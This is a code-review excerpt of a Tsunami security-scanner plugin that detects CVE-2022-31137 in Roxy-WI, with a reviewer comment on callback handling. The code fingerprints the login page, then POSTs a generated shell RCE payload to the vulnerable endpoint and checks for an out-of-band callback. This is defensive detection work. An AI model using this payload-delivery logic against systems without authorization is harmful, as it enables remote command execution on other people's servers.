community/detectors/roxy_wi_cve_2022_31137/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202231137/Cve202231137Detector.java

```diff
@@ -0,0 +1,191 @@
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean isRoxyWiWebService(NetworkService networkService) {
+    // note that this fingerprint phase is only for vulnerable versions,
+    // because newer Roxy-Wi versions have different endpoints for login
+    String targetUrl =
+        NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "app/login.py";
+    try {
+      Optional<String> response =
+          httpClient.send(get(targetUrl).withEmptyHeaders().build(), networkService).bodyString();
+      return response.isPresent() && response.get().contains("<title>Login page - Roxy-WI</title>");
+    } catch (IOException e) {
+      logger.atWarning().withCause(e).log("Request to target %s failed", networkService);
+    }
+    return false;
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    PayloadGeneratorConfig config =
+        PayloadGeneratorConfig.newBuilder()
+            .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE)
+            .setInterpretationEnvironment(
+                PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL)
+            .setExecutionEnvironment(
+                PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+            .build();
+
+    Payload payload = payloadGenerator.generate(config);
+    // Check callback server is enabled
+    if (!payload.getPayloadAttributes().getUsesCallbackServer()) {
+      logger.atInfo().log(
+          "The Tsunami callback server is not setup for this environment, so we cannot confirm the"
+              + " RCE callback");
+      return false;
+    }
+    String cmd = payload.getPayload();
+
+    HttpResponse response = null;
+    String targetVulnerabilityUrl =
+        NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + VULNERABLE_REQUEST_PATH;
+    try {
+      response =
+          httpClient.send(
+              post(targetVulnerabilityUrl)
+                  .withEmptyHeaders()
+                  .setRequestBody(
+                      ByteString.copyFromUtf8(
+                          String.format(
+                              HTTP_PARAMETERS, URLEncoder.encode(cmd, StandardCharsets.UTF_8))))
+                  .build(),
+              networkService);
+    } catch (IOException | AssertionError e) {
+      logger.atWarning().withCause(e).log("Request to target %s failed", networkService);
+    }
+    if (response == null || response.bodyString().isEmpty()) {
+      return false;
+    }
+    // If there is an RCE, the execution isn't immediate
+    logger.atInfo().log("Waiting for RCE callback.");
+    Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration));
+    if (payload.checkIfExecuted(response.bodyString().get())) {
+      logger.atInfo().log("RCE payload executed!");
+      return true;
+    }
+    return false;

```

Comment:
Please wait for the callback only when the callback server is involved in the operation.

```suggestion
    if (payload.getPayloadAttributes().getUsesCallbackServer()) {
      logger.atInfo().log("Waiting for RCE callback.");
      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration));
    }

    return payload.checkIfExecuted(response.bodyString().get());
```